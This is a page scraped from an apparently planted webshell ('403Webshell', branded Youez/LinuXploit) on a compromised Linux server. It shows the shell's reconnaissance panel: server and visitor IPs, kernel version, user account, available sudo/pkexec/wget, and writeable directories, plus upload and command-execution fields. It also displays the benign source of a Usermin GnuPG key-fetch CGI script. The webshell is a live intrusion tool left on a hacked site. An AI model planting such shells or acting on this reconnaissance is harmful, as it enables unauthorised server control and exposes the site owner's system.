403Webshell
Server IP : 172.67.134.114  /  Your IP : 162.159.115.41
Web Server : Apache/2.4.37
System : Linux almalinux.duckdns.org 4.18.0-553.111.1.el8_10.x86_64 #1 SMP Sun Mar 8 20:06:07 EDT 2026 x86_64
User : ricodeal ( 1046)
PHP Version : 7.4.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /usr/libexec/usermin/gnupg/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /usr/libexec/usermin/gnupg/recv.cgi
#!/usr/bin/perl
# recv.cgi
# Fetch a key from the keyserver

require './gnupg-lib.pl';
&ReadParse();
&ui_print_header(undef, $text{'recv_title'}, "");

$in{'id'} =~ s/^0x//i;
print "<p>",&text('recv_desc', $in{'id'},
		  "<tt>$config{'keyserver'}</tt>"),"<p>\n";

($ok, $msg) = &fetch_gpg_key($in{'id'});
if ($ok == 1 || $ok == 3) {
	print "<p>",&text('recv_failed', "<pre>$msg</pre>"),"<p>\n";
	}
elsif ($ok == 2) {
	print "<p>",&text('recv_same', $msg->{'name'}->[0]),"<p>\n";
	}
else {
	print "<p>",&text('recv_success', $msg->{'name'}->[0]),"<p>\n";
	}

if ($in{'return'}) {
	&ui_print_footer($in{'return'}, $in{'returnmsg'});
	}
else {
	&ui_print_footer("list_keys.cgi", $text{'keys_return'},
			 "", $text{'index_return'});
	}


Youez - 2016 - github.com/yon3zu
LinuXploit